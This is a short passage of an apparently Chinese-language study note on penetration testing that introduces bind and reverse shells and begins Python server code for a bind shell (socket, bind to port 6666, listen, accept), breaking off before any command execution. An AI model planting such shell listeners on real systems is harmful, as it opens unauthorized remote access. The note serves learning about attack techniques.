学习渗透怎么能不会shell呢,今天和明天的学习内容就是正向shell和反弹shell啦~~
shell:在计算机科学中,Shell俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。(ps:这个是百度百科的解释啦~~~)
当客户端攻击服务器端时,此时服务器端IP地址已知,所以可以使用正向shell
在这里分别写服务器端代码和客户端代码;注:每次运行时要先开服务器端
服务器端(被攻击,导入模块:import os;import socket)
基本步骤:
1、创建套接字
s=socket.socket()
2、进行绑定(ip:允许连接的ip,服务器端端口)
s.bind(("0.0.0.0",6666))
3、允许连入的主机数
s.listen()
4、创建接口与连入的主机地址
con,addr=s.accept()
<